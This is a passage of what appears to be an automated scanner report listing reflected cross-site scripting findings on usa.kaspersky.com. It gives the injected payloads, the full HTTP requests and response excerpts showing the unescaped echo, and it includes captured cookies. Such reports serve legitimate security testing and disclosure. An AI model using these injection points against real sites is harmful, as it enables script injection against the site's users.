Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:16:00 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142160"
Content-Type: text/html; charset=utf-8
Content-Length: 40731
Date: Sun, 04 Sep 2011 13:16:03 GMT
X-Varnish: 1163139925
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32" />
...[SNIP]...

1.137. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f909e"><script>alert(1)</script>6f2d209b2fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/tablet-security?f909e"><script>alert(1)</script>6f2d209b2fa=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141855"
Content-Type: text/html; charset=utf-8
Content-Length: 49516
Date: Sun, 04 Sep 2011 13:11:06 GMT
X-Varnish: 1163130082
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-security?f909e"><script>alert(1)</script>6f2d209b2fa=1" />
...[SNIP]...

1.138. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ff9"><script>alert(1)</script>485f603b1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145440"
Content-Type: text/html; charset=utf-8
Content-Length: 31618
Date: Sun, 04 Sep 2011 14:10:47 GMT
X-Varnish: 1163255930
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-centerf2ff9"><script>alert(1)</script>485f603b1ae/index.html" />
...[SNIP]...

1.139. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3acc"-alert(1)-"75ba5310b70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:04 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145464"
Content-Type: text/html; charset=utf-8
Content-Length: 30280
Date: Sun, 04 Sep 2011 14:11:20 GMT
X-Varnish: 1163256816
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-centera3acc"-alert(1)-"75ba5310b70/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.140. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56241"><script>alert(1)</script>8fdcf2dfe51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145516"
Content-Type: text/html; charset=utf-8
Content-Length: 31952
Date: Sun, 04 Sep 2011 14:11:59 GMT
X-Varnish: 1163258668
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/index.html56241"><script>alert(1)</script>8fdcf2dfe51" />
...[SNIP]...

1.141. http://usa.kaspersky.com/resources/knowledge-center/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8f2"-alert(1)-"38af26a7928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:12:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145536"
Content-Type: text/html; charset=utf-8
Content-Length: 30620
Date: Sun, 04 Sep 2011 14:12:21 GMT
X-Varnish: 1163259536
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/index.html5e8f2"-alert(1)-"38af26a7928";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.142. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f13"-alert(1)-"3296f683bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145291"
Content-Type: text/html; charset=utf-8
Content-Length: 37369
Date: Sun, 04 Sep 2011 14:08:24 GMT
X-Varnish: 1163250338
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/index.html?31f13"-alert(1)-"3296f683bfa=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.143. http://usa.kaspersky.com/resources/knowledge-center/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a644"><script>alert(1)</script>0a50e7eee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145252"
Content-Type: text/html; charset=utf-8
Content-Length: 37589
Date: Sun, 04 Sep 2011 14:07:40 GMT
X-Varnish: 1163248700
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/index.html?6a644"><script>alert(1)</script>0a50e7eee8=1" />
...[SNIP]...

1.144. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83184"><script>alert(1)</script>569acb540ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources83184"><script>alert(1)</script>569acb540ba/knowledge-center/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141816"
Content-Type: text/html; charset=utf-8
Content-Length: 32071
Date: Sun, 04 Sep 2011 13:10:25 GMT
X-Varnish: 1163129143
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources83184"><script>alert(1)</script>569acb540ba/knowledge-center/whitepapers" />
...[SNIP]...

1.145. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efae4"-alert(1)-"adf5365208a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resourcesefae4"-alert(1)-"adf5365208a/knowledge-center/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:10:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141844"
Content-Type: text/html; charset=utf-8
Content-Length: 30725
Date: Sun, 04 Sep 2011 13:10:52 GMT
X-Varnish: 1163129840
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resourcesefae4"-alert(1)-"adf5365208a/knowledge-center/whitepapers";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.146. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9159e"-alert(1)-"b59df5b2090 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resources/knowledge-center9159e"-alert(1)-"b59df5b2090/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:29 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141949"
Content-Type: text/html; charset=utf-8
Content-Length: 30295
Date: Sun, 04 Sep 2011 13:12:33 GMT
X-Varnish: 1163132425
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center9159e"-alert(1)-"b59df5b2090/whitepapers";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.147. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395c"><script>alert(1)</script>3905b3800ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-centerb395c"><script>alert(1)</script>3905b3800ed/whitepapers HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:12:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141925"
Content-Type: text/html; charset=utf-8
Content-Length: 31633
Date: Sun, 04 Sep 2011 13:12:15 GMT
X-Varnish: 1163131686
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-centerb395c"><script>alert(1)</script>3905b3800ed/whitepapers" />
...[SNIP]...

1.148. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40126"><script>alert(1)</script>4d4c1686dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/whitepapers40126"><script>alert(1)</script>4d4c1686dd3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:19 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141999"
Content-Type: text/html; charset=utf-8
Content-Length: 33350
Date: Sun, 04 Sep 2011 13:13:24 GMT
X-Varnish: 1163134304
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/whitepapers40126"><script>alert(1)</script>4d4c1686dd3" />
...[SNIP]...

1.149. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

